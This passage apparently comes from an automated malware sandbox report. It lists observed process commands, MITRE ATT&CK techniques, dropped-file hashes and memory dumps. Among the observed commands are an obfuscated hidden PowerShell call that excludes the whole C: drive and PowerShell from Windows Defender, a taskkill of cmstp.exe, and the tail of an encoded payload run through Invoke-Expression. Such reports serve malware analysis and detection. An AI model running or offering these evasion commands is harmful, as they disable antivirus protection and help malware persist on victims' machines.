dtc3BudXhmcmllc2dmbXlvICRudWxsO3RwdXdwdWtqYnFscGdwZ3d1bnRmbnBnc2QgJHpvc3NnZnZ2emFzcmJjbXBsc3dseHlkcmogKCxbc3RyaW5nW11dICgnJUFCQycpKTs=')) | Invoke-Expression"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:2600

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1872

C:\Windows\system32\taskkill.exe
taskkill /IM cmstp.exe /F
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:432

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
332B

MD5
b4bfdba09841c4ad591fae15c486c6ef

SHA1
be9fa643df37271cec1c7315056b1e84233a973f

SHA256
6a4ae8d0d01d00e0a7dcc0abd1a98879799ea5d67a9a09286111ac51ec57b1eb

SHA512
60f68661f0f20c168d9d5ac60087c575689d643d73be842185461ccb21d4a65259b4b550285a9056d7e9838419786aa34320b46d74825ff88b481b1a79b0d6c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4a94b4432dca934df6651a53f56abe6b

SHA1
1461c5bc22eaef55ed98713d67a4c5f5c8e11d69

SHA256
63455ddf3d736ca85a5a6805851142c18f28b9987d5f6caa9dd490269b34f8a2

SHA512
8f262e5b722138e3b1576e89528a46c031a0239939d45916e0a688ca802c6de3d3ddf19391a6b5660ac7fb9dc9da25eb9c2ad8fd77ed798175a09e2095cb94b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8647.tmp

Filesize
1KB

MD5
6bc172c5a9b7e0cc86652dc9bfabd8e6

SHA1
2ff30123ce557609580ed8af6c797b5e38d0e993

SHA256
842d1c4265010adfbb01a3f3eb3d74d56d1c8cae3e76b5b34ab4f0891628e69d

SHA512
91c103d33d61e4847579345d20db9aba6cf5ee561eefe2c661d6abf48eb6d41ff055a8157b1c8a9a422fe9229c8dbf438ebba2aa759436fb6368fde3e61afd9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vtxy251c.uwl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\b4vh3fa1\b4vh3fa1.dll

Filesize
4KB

MD5
69ef5f0b798f47c307558a30391acbca

SHA1
cd90cc7f1c7567de507309157e2ccdcb430726b9

SHA256
75bea3b2d898dc41a284a6f05b9fdc77ab3d0eec33eae9fb1c1b67fb9009c1bc

SHA512
6ea3c99eaf794942873b18b127841631061e10de1da8a6a7a9928afdfba80f46b0d8c8e26c039134d48c44e3070ce8fc1a62450dc181905a60b6fe21fe535562

Download Submit
C:\Users\Admin\AppData\Local\Temp\c.bat

Filesize
269KB

MD5
245dd461fa69b6c1d8abbf653b318cff

SHA1
90c2ac95dbb0eb62c94b835dd38cc81af9ff1e70

SHA256
6d582333e7c644edbc40e5856c267f5d321c33d705940a7e3450795fa1bebc3d

SHA512
aba92cb3c4804d86c1d3ce457603918cf961e23c76d9de1af3eb5d80fb3b5903e56bfb8da007848a5d341d7100a1404ae472db3ebd1529be51a5f63c7d4e40f7

Download Submit
C:\windows\temp\mkjxdgnw.inf

Filesize
663B

MD5
27581dbbe3c3840ce72f99c21071898a

SHA1
898afeb9523df9367c74a01c0dbecf6b637f3cb1

SHA256
c5f2bbdebccd52c3eba3c97a251ffa2ccd01f64de764e560f804045fe868d27b

SHA512
0b9c4531e8be5b292638cb2cad7fd1b72ed3f1aa20ea027b9a013a8bfb2daaa4a25a40c37423e0924d110bbbbfad4a6e21aa03f4694978d205d7ac9739567d9f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\b4vh3fa1\CSCDD351B443BB4DDA97D2AB97738E4.TMP

Filesize
652B

MD5
87e6f191efc9513cb3b09d18268e9ceb

SHA1
9055627b8fcc6d2c6d36e6dc81e8e1932a213984

SHA256
8d30c261f3019f027de51f6aeffde6003bb511faa83b695e0ce1ebccab023b53

SHA512
0037b7be11513137b15dc429a6e07e2c0081ff1b7c849b69cbdb69751a7c1b0511b3fa522862b68f429c1396bac877ae4a45a66c2e091af0a0effd13379be5be

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\b4vh3fa1\b4vh3fa1.0.cs

Filesize
2KB

MD5
b8106096972fb511e0cf8b99386ecf93

SHA1
3003ba3a3681ba16d124d5b2305e6cc59af79b44

SHA256
49d2a0f78cbec3d87396b6f52f791c66505edeec87a70d4ce45721288210da02

SHA512
218bd9cd17c56d2e138205a197780cc2a5a81bfce7d5439eecb168f61955ba97793e7333425c064f6b6337e1f70c75bd373a7fb502a8c538fb046600018f871e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\b4vh3fa1\b4vh3fa1.cmdline

Filesize
369B

MD5
0c12ac63ea8dad2f3d88ad0bfd77bcbd

SHA1
2be8d7d69a83d2adcb44caa1f7f647f2caac1648

SHA256
af66f4b7b6814d80cbe1f5fcf8a941f1aba9dc1ce4aea31d3f196631ec274a9a

SHA512
88b302d60b70fbd20f91090fac767949da237e4ee23b6e1b81fd9ee503aa8d3a266331f9ea6365b771b24299d0db870d99f3914b849605801ea73e2def76fbfb

Download Submit
memory/2600-59-0x0000000005D30000-0x0000000005D96000-memory.dmp

Filesize
408KB

Download
memory/2600-75-0x00000000079D0000-0x0000000007A02000-memory.dmp

Filesize
200KB

Download
memory/2600-107-0x0000000009120000-0x000000000912A000-memory.dmp

Filesize
40KB

Download
memory/2600-105-0x0000000008FD0000-0x000000000900C000-memory.dmp

Filesize
240KB

Download
memory/2600-104-0x0000000008F70000-0x0000000008F82000-memory.dmp

Filesize
72KB

Download
memory/2600-103-0x0000000008490000-0x0000000008522000-memory.dmp

Filesize
584KB

Download
memory/2600-102-0x0000000008390000-0x00000000083EE000-memory.dmp

Filesize
376KB

Download
memory/2600-99-0x0000000008940000-0x0000000008EE4000-memory.dmp

Filesize
5.6MB

Download
memory/2600-55-0x0000000002ED0000-0x0000000002F06000-memory.dmp

Filesize
216KB

Download
memory/2600-56-0x00000000055A0000-0x0000000005BC8000-memory.dmp

Filesize
6.2MB

Download
memory/2600-57-0x00000000053D0000-0x00000000053F2000-memory.dmp

Filesize
136KB

Download
memory/2600-58-0x0000000005CC0000-0x0000000005D26000-memory.dmp

Filesize
408KB

Download
memory/2600-98-0x0000000007960000-0x0000000007994000-memory.dmp

Filesize
208KB

Download
memory/2600-69-0x0000000005DA0000-0x00000000060F4000-memory.dmp

Filesize
3.3MB

Download
memory/2600-97-0x0000000005220000-0x0000000005228000-memory.dmp

Filesize
32KB

Download
memory/2600-71-0x0000000006290000-0x00000000062AE000-memory.dmp

Filesize
120KB

Download
memory/2600-72-0x0000000006330000-0x000000000637C000-memory.dmp

Filesize
304KB

Download
memory/2600-73-0x0000000007BD0000-0x000000000824A000-memory.dmp

Filesize
6.5MB

Download
memory/2600-74-0x00000000067B0000-0x00000000067CA000-memory.dmp

Filesize
104KB

Download
memory/2600-95-0x0000000008250000-0x0000000008258000-memory.dmp

Filesize
32KB

Download
memory/2600-76-0x0000000071180000-0x00000000711CC000-memory.dmp

Filesize
304KB

Download
memory/2600-77-0x0000000071720000-0x0000000071A74000-memory.dmp

Filesize
3.3MB

Download
memory/2600-87-0x0000000007A10000-0x0000000007A2E000-memory.dmp

Filesize
120KB

Download
memory/2600-88-0x0000000007A40000-0x0000000007AE3000-memory.dmp

Filesize
652KB

Download
memory/2600-89-0x0000000007B40000-0x0000000007B4A000-memory.dmp

Filesize
40KB

Download
memory/2600-90-0x00000000082F0000-0x0000000008386000-memory.dmp

Filesize
600KB

Download
memory/2600-91-0x0000000007B50000-0x0000000007B61000-memory.dmp

Filesize
68KB

Download
memory/2600-92-0x0000000007B80000-0x0000000007B8E000-memory.dmp

Filesize
56KB

Download
memory/2600-93-0x0000000007BA0000-0x0000000007BB4000-memory.dmp

Filesize
80KB

Download
memory/2600-94-0x0000000008270000-0x000000000828A000-memory.dmp

Filesize
104KB

Download
memory/4844-30-0x0000011E17300000-0x0000011E17308000-memory.dmp

Filesize
32KB

Download
memory/4844-4-0x00007FF82BE53000-0x00007FF82BE55000-memory.dmp

Filesize
8KB

Download
memory/4844-14-0x0000011E17270000-0x0000011E17292000-memory.dmp

Filesize
136KB

Download
memory/4844-52-0x00007FF82BE50000-0x00007FF82C911000-memory.dmp

Filesize
10.8MB

Download
memory/4844-15-0x00007FF82BE50000-0x00007FF82C911000-memory.dmp

Filesize
10.8MB

Download
memory/4844-16-0x00007FF82BE50000-0x00007FF82C911000-memory.dmp

Filesize
10.8MB

Download
memory/4844-48-0x00007FF82BE50000-0x00007FF82C911000-memory.dmp

Filesize
10.8MB

Download
memory/4844-47-0x00007FF82BE53000-0x00007FF82BE55000-memory.dmp

Filesize
8KB

Download
memory/4844-17-0x0000011E172E0000-0x0000011E172FC000-memory.dmp

Filesize
112KB

Download